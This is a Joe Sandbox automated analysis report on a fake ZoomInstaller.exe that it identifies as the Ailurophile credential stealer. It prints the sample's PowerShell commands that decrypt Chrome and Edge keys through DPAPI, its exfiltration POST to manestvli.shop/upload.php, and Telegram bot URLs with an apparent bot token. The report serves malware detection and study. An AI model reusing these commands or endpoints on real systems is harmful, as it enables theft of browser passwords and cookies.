Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name:ZoomInstaller.exe
Analysis ID:1544493
MD5:806a6ccce380785faa45512ce603c580
SHA1:78a2936e19f0474f80f73144564e9f24c4559859
SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags:exeuser-NDA0E
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • ZoomInstaller.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\ZoomInstaller.exe" MD5: 806A6CCCE380785FAA45512CE603C580)
    • WMIC.exe (PID: 800 cmdline: wmic path win32_videocontroller get caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 5584 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5932 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2328 cmdline: wmic os get Version MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5696 cmdline: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5204 cmdline: powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 6236 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1524 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5704 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: ZoomInstaller.exe PID: 5368JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    Sigma Signatures

    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZoomInstaller.exe", ParentImage: C:\Users\user\Desktop\ZoomInstaller.exe, ParentProcessId: 5368, ParentProcessName: ZoomInstaller.exe, ProcessCommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", ProcessId: 5696, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-29T14:10:18.734692+010020571041Domain Observed Used for C2 Detected192.168.2.649970188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-29T14:10:15.996082+010020571031Domain Observed Used for C2 Detected192.168.2.6542991.1.1.153UDP
    2024-10-29T14:10:16.997721+010020571031Domain Observed Used for C2 Detected192.168.2.6542991.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
    Machine Learning detection for sample
    Source: ZoomInstaller.exeJoe Sandbox ML: detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD347652AE CryptUnprotectData,17_2_00007FFD347652AE
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD3476517D CryptUnprotectData,20_2_00007FFD3476517D
    Source: ZoomInstaller.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.6:54299 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.6:49970 -> 188.114.97.3:443
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewIP Address: 104.26.9.59 104.26.9.59
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.myip.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
    Source: global trafficDNS traffic detected: DNS query: api.myip.com
    Source: global trafficDNS traffic detected: DNS query: manestvli.shop
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: unknownHTTP traffic detected: POST /upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drTGVaZ3AxOTRJRGVqMlNEZGJDYXJxbXRwNWQ4cTJaOG5ubVpmOTFxcllLRnRLYXYwTGl1Z0tQRnFYeWRxOCtXcktLcmpvU3NaNnZSbEtlTmJLeW1sbVp0MDVhbmVJeVZpSmljeEpuSHNYMTlwNmQ4ZW5iZmxOMTNySUYwbDZpdTBLaHNnWDJ6WVh5ZHE4K1ZxM3l1bDJUSHA4WFR0YkY5bzlHWmdIZDkyWHZSaEtxV1k5ZWh2TDZ3b0lPaXE2bDhuYXZQaTd5TVpKWmp2YUhFcmR1eGZhUFJtWUNIZmRsNzBZU2NsNTYxcTZ2UTBxQ0JmS3VqZktHTzFwU3JqSzU5bTlLYXI2bXNxbjJtc0thWGkybVdsZEtobllPYXJZZkUwODluanBDemw0aG5oczZXcTR5dWZacmFtc2FZcWFxV2dMaGdmSjZqejMrM2Y2ZDluc3VoeFptMXJaZW56Wm1DblgzZGU5Sm1jUT09&hash=2d6441c1bfc749b0344f HTTP/1.1Host: manestvli.shopUser-Agent: Go-http-client/1.1Content-Length: 3788Content-Type: multipart/form-data; boundary=2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091cAccept-Encoding: gzip
    Source: powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000068000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001A4000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.drString found in binary or memory: https://ailurophilestealer.com
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000212000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ailurophilestealer.com/bot
    Source: powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.com
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.myip.comhttps://api.myip.comHTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxyGe
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000410000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessageCookies
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F3427B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://manestvli.shop/upload.php?https://manestvli.shop/upload.php?
    Source: powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
    Source: ZoomInstaller.exe, 00000000.00000002.2809918289.00007FF6C414E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: github.com/lxn/win.getRawInputDatamemstr_920ec209-c
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD34763EF817_2_00007FFD34763EF8
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD3476268817_2_00007FFD34762688
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD34763B9D17_2_00007FFD34763B9D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD34763AFB20_2_00007FFD34763AFB
    Source: ZoomInstaller.exeStatic PE information: Number of sections : 24 > 10
    Source: ZoomInstaller.exe, 00000000.00000002.2809918289.00007FF6C414E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: ZoomInstaller.exeBinary or memory string: OriginalFilenameSecurePro.exeD vs ZoomInstaller.exe
    Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@28/27@4/3
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\AilurophileJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6116:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upcrjvg1.r0x.ps1Jump to behavior
    Source: ZoomInstaller.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000344000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000344000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name, value FROM autofillSELECT name, value FROM autofillPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
    Source: ZoomInstaller.exe, 00000000.00000003.2745006744.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2744692313.000002A27BFB2000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003B7000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2744818712.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003C5000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000003.2745103919.000002A27BF88000.00000004.00000020.00020000.00000000.sdmp, passwords.db0.0.dr, passwords.db.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ZoomInstaller.exe, 00000000.00000002.2809435610.00007FF6C3DCC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
